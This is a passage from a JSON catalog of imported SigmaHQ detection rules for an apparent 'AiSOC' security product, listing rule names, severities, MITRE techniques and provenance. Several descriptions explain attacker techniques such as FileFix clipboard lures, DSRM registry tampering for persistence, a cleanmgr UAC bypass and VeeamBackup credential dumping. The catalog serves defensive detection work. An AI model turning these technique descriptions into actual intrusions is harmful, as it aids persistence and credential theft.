"rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml" } }, { "id": "sigmahq-sigma-b4dc61f5-6cce-468e-a608-b48b469feaa2", "type": "detection", "name": "DirLister Execution", "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dirlister-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dirlister_execution.yml" } }, { "id": "sigmahq-sigma-b4e6b016-a2ac-4759-ad85-8000b300d61e", "type": "detection", "name": "OpenCanary - TFTP Request", "description": "Detects instances where a TFTP service on an OpenCanary node has had a request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-tftp-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"b4e6b016-a2ac-4759-ad85-8000b300d61e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_tftp_request.yml" } }, { "id": "sigmahq-sigma-b52e84a3-029e-4529-b09b-71d19dd27e94", "type": "detection", "name": "Remote Access Tool - AnyDesk Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b52e84a3-029e-4529-b09b-71d19dd27e94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml" } }, { "id": "sigmahq-sigma-b53317a0-8acf-4fd1-8de8-a5401e776b96", "type": "detection", "name": "Application Removed Via Wmic.EXE", "description": "Detects the removal or uninstallation of an 
application via \"Wmic.EXE\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-removed-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml" } }, { "id": "sigmahq-sigma-b5522a23-82da-44e5-9c8b-e10ed8955f88", "type": "detection", "name": "Powershell Execute Batch Script", "description": "Detects a batch script being executed from PowerShell.\nAdversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-execute-batch-script.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" } }, { "id": "sigmahq-sigma-b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "type": "detection", "name": "DNS Query Tor .Onion Address - Sysmon", "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-tor-onion-address-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml" } }, { "id": "sigmahq-sigma-b55d23e5-6821-44ff-8a6e-67218891e49f", "type": "detection", "name": "HybridConnectionManager Service Running", "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/hybridconnectionmanager-service-running.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b55d23e5-6821-44ff-8a6e-67218891e49f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" } }, { "id": "sigmahq-sigma-b5746143-59d6-4603-8d06-acbd60e166ee", "type": "detection", "name": "Uncommon Child Process Of AddinUtil.EXE", "description": "Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-addinutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5746143-59d6-4603-8d06-acbd60e166ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-b57ba453-b384-4ab9-9f40-1038086b4e53", "type": "detection", "name": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", "description": "Detects dump of credentials in VeeamBackup dbo", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/veeambackup-database-credentials-dump-via-sqlcmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" } }, { "id": "sigmahq-sigma-b593fd50-7335-4682-a36c-4edcb68e4641", "type": "detection", "name": "Monero Crypto Coin Mining Pool Lookup", "description": "Detects suspicious DNS queries to Monero mining pools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1496", "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/network/monero-crypto-coin-mining-pool-lookup.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b593fd50-7335-4682-a36c-4edcb68e4641", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" } }, { "id": "sigmahq-sigma-b59c98c6-95e8-4d65-93ee-f594dfb96b17", "type": "detection", "name": "F5 BIG-IP iControl Rest API Command Execution - Proxy", "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/f5-big-ip-icontrol-rest-api-command-execution-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b59c98c6-95e8-4d65-93ee-f594dfb96b17", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml" } }, { "id": "sigmahq-sigma-b5aa7d60-c17e-4538-97de-09029d6cd76b", "type": "detection", "name": "Suspicious Digital Signature Of AppX Package", "description": "Detects execution of AppX packages with known suspicious or malicious signature", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-digital-signature-of-appx-package.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml" } }, { "id": "sigmahq-sigma-b5b29e4e-31fa-4fdf-b058-296e7a1aa0c2", "type": "detection", "name": "Suspicious FileFix Execution Pattern", "description": "Detects 
suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation.\nThis attack typically begins when users visit malicious websites impersonating legitimate services or news platforms,\nwhich may display fake CAPTCHA challenges or direct instructions to open file explorer and paste clipboard content.\nThe clipboard content usually contains commands that download and execute malware, such as information stealing tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-filefix-execution-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5b29e4e-31fa-4fdf-b058-296e7a1aa0c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_filefix_execution_pattern.yml" } }, { "id": "sigmahq-sigma-b5b78988-486d-4a80-b991-930eff3ff8bf", "type": "detection", "name": "PowerShell Profile Modification", "description": "Detects the creation or modification of a powershell profile, which could indicate suspicious activity as the profile can be used as a means of persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-profile-modification.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" } }, { "id": "sigmahq-sigma-b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "type": "detection", "name": "Potential Binary Proxy Execution Via Cdb.EXE", "description": "Detects usage of \"cdb.exe\" to launch arbitrary processes or commands from a debugger script file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1218", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-proxy-execution-via-cdb-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cdb_arbitrary_command_execution.yml" } }, { "id": "sigmahq-sigma-b5de0c9a-6f19-43e0-af4e-55ad01f550af", "type": "detection", "name": "Unsigned DLL Loaded by Windows Utility", "description": "Detects windows utilities loading an unsigned or untrusted DLL.\nAdversaries often abuse those programs to proxy execution of malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1218.011", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-dll-loaded-by-windows-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5de0c9a-6f19-43e0-af4e-55ad01f550af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_unsigned_dll.yml" } }, { "id": "sigmahq-sigma-b5de2919-b74a-4805-91a7-5049accbaefe", "type": "detection", "name": "Download From Suspicious TLD - Whitelist", "description": "Detects executable downloads from suspicious remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1203", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-from-suspicious-tld-whitelist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5de2919-b74a-4805-91a7-5049accbaefe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml" } }, { "id": "sigmahq-sigma-b6188d2f-b3c4-4d2c-a17d-9706e0851af0", "type": "detection", "name": "Potential Goopdate.DLL Sideloading", "description": "Detects potential DLL sideloading of \"goopdate.dll\", a DLL used by googleupdate.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-goopdate-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6188d2f-b3c4-4d2c-a17d-9706e0851af0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_goopdate.yml" } }, { "id": "sigmahq-sigma-b61e87c0-50db-4b2e-8986-6a2be94b33b0", "type": "detection", "name": "Directory Service Restore Mode(DSRM) Registry Value Tampering", "description": "Detects changes to \"DsrmAdminLogonBehavior\" registry value.\nDuring a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. 
The DSRM account is an \u201cAdministrator\u201d account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.\nAttackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"0\", the administrator account can only be used if the DC starts in DSRM.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"1\", the administrator account can only be used if the local AD DS service is stopped.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"2\", the administrator account can always be used.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/directory-service-restore-mode-dsrm-registry-value-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b61e87c0-50db-4b2e-8986-6a2be94b33b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml" } }, { "id": "sigmahq-sigma-b640c0b8-87f8-4daa-aef8-95a24261dd1d", "type": "detection", "name": "MITRE BZAR Indicators for Execution", "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. 
All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1053.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mitre-bzar-indicators-for-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" } }, { "id": "sigmahq-sigma-b6457d63-d2a2-4e29-859d-4e7affc153d1", "type": "detection", "name": "Potential Discovery Activity Via Dnscmd.EXE", "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones are used to host the DNS records for a particular domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-discovery-activity-via-dnscmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" } }, { "id": "sigmahq-sigma-b64a026b-8deb-4c1d-92fd-98893209dff1", "type": "detection", "name": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/running-chrome-vpn-extensions-via-the-registry-2-vpn-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_chrome_extension.yml" } }, { "id": 
"sigmahq-sigma-b655a06a-31c0-477a-95c2-3726b83d649d", "type": "detection", "name": "Suspicious Userinit Child Process", "description": "Detects a suspicious child process of userinit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-userinit-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b655a06a-31c0-477a-95c2-3726b83d649d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" } }, { "id": "sigmahq-sigma-b66474aa-bd92-4333-a16c-298155b120df", "type": "detection", "name": "Potential Persistence Via Powershell Search Order Hijacking - Task", "description": "Detects suspicious powershell execution via a scheduled task where the command ends with suspicious flags to hide the powershell instance instead of executing scripts or commands. 
This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-powershell-search-order-hijacking-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b66474aa-bd92-4333-a16c-298155b120df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml" } }, { "id": "sigmahq-sigma-b6676963-0353-4f88-90f5-36c20d443c6a", "type": "detection", "name": "Cscript/Wscript Potentially Suspicious Child Process", "description": "Detects potentially suspicious child processes of Wscript/Cscript. 
These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.\nMalware such as Pikabot and Qakbot were seen using similar techniques as well as many others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cscript-wscript-potentially-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6676963-0353-4f88-90f5-36c20d443c6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-b697e69c-746f-4a86-9f59-7bfff8eab881", "type": "detection", "name": "UAC Bypass Using Disk Cleanup", "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-disk-cleanup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" } }, { "id": "sigmahq-sigma-b69888d4-380c-45ce-9cf9-d9ce46e67821", "type": "detection", "name": "Hidden Executable In NTFS Alternate Data Stream", "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-executable-in-ntfs-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" } }, { "id": "sigmahq-sigma-b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "type": "detection", "name": "Potential PowerShell Obfuscation Via Reversed Commands", "description": "Detects the presence of reversed PowerShell commands in the CommandLine. 
This is often used as a method of obfuscation by attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-via-reversed-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" } }, { "id": "sigmahq-sigma-b6c718dd-8f53-4b9f-98d8-93fdca966969", "type": "detection", "name": "New Okta User Created", "description": "Detects new user account creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-okta-user-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6c718dd-8f53-4b9f-98d8-93fdca966969", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_user_created.yml" } }, { "id": "sigmahq-sigma-b6d235fc-1d38-4b12-adbe-325f06728f37", "type": "detection", "name": "CMSTP Execution Registry Event", "description": "Detects various 
